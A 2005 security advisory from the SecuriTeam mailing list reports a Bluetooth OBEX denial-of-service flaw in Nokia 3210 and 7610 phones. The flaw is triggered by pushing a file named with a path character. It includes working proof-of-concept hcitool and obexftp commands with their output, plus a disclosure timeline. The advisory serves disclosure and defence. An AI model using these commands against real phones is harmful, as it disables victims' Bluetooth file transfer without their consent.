[NEWS] Nokia 3210 and 7610 Remote OBEX Denial of Service

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Nokia 3210 and 7610 Remote OBEX Denial of Service
------------------------------------------------------------------------


SUMMARY

" <http://www.ravioli.pasta.cs.uit.no/open-obex/> OBEX is a session
protocol and can best be described as a binary HTTP protocol."
" <http://www.europe.nokia.com/nokia/0,,118,00.html> The Nokia 3210 phone
has an ergonomic design with a large display, easy-to-use keypad, and
built-in antenna."
" <http://www.europe.nokia.com/nokia/0,,54665,00.html> The Nokia 7610
imaging phone with its sleek, compact design stands out in any crowd."

A remote Denial of Service vulnerability exists in Nokia 3210 and 7610
phones, caused due to a failure of the operating system to handle certain
filename characters in Bluetooth OBEX transfers.

DETAILS

Vulnerable Systems:
* Nokia version 4.0.437 15-09-04 RH51

Nokia 3210 and 7610 phones do not properly process the handle characters
in a file name arriving from a Bluetooth OBEX transfer.

The protocol states: "Pushing objects into the inbox Objects are pushed
into the inbox by using the PUT command with a Name header. The string in
the Name header should not contain any path characters such as ?:?, ?/? or
?\?. Objects with improperly formed names should be rejected."

The device asks for a PIN if users are not paired, or asks if they want to
accept a connection of the remote box. The users have to ACCEPT the file
for this vulnerability to work.

If a connection is established, the file is sent but the device does not
display the "New message arrived" message such as when the user received a
correct archive, and the file is dropped.
The problem exists with the OBEX service stopping to work when a bad file
is accepted. If the attacker tries to send another file or some vcard from
other devices, they can not connect to the remote OBEX service again.

An attacker may leverage this issue to cause affected Nokia devices to
fail to respond to further Bluetooth OBEX communications, likely until the
phone is next restarted.

Proof of Concept:
jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610

jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect

Disclosure Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


ADDITIONAL INFORMATION

The information has been provided by <mailto:fl@xxxxxxxxxxx> Franckl
MobiBug.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.